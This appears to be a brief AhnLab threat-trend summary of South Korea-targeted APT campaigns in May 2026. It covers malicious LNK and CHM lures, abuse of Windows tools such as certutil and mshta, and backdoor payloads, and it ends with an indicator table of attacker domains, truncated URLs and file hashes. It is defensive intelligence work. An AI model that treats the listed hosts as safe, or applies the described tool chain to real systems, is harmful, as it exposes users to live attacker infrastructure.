May 2026 Threat Trend Report on APT Attacks (South Korea)
2026-06-29 • Ahnlab •
AhnLab observed May 2026 South Korea-focused APT activity dominated by spear phishing, especially malicious LNK attachments and some CHM files. The attack chains used PowerShell, CMD, XML, JS, VBScript, BAT files, AutoIt, HTA, Python, and legitimate Windows tools such as curl.exe, regsvr32.exe, certutil.exe, wscript.exe, mshta, and Task Scheduler to download payloads, maintain persistence, and run backdoors or infostealers. Reported payload behavior included command execution, file upload and download, directory querying, system information theft, keylogging, XenoRAT-type deployment, DLL side-loading, and Python backdoor communications with attacker infrastructure.
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| DOMAIN | update.nstlog.store | 2026-06-29 | 2026-06-29 |
| DOMAIN | univercity.library.boxathome.net | 2026-06-29 | 2026-06-29 |
| URL | https://drive.google.com/uc?exp… | 2026-06-29 | 2026-06-29 |
| URL | https://drive.google.com/uc?exp… | 2026-06-29 | 2026-06-29 |
| URL | https://aplore.kesug.com/repmay… | 2026-06-29 | 2026-06-29 |
| URL | http://newtech.dkcreatech.com:5… | 2026-06-29 | 2026-06-29 |
| HASH | 12391f66ee33d379108fd649a999e1a0 | 2026-06-29 | 2026-06-29 |
| HASH | 0d2e61c8a5e6280e065b61e75b848c68 | 2026-06-29 | 2026-06-29 |
| HASH | 090cfb95ce9ff312c501d7f43267f9ff | 2026-06-29 | 2026-06-29 |
| HASH | 0896485da9a470d504fbaad570b16358 | 2026-06-29 | 2026-06-29 |
| HASH | 076a8a0ae0c7d6270070b297c8617e2e | 2026-06-29 | 2026-06-29 |
| URL | https://aplore.kesug.com/riln.p… | 2026-05-26 | 2026-06-29 |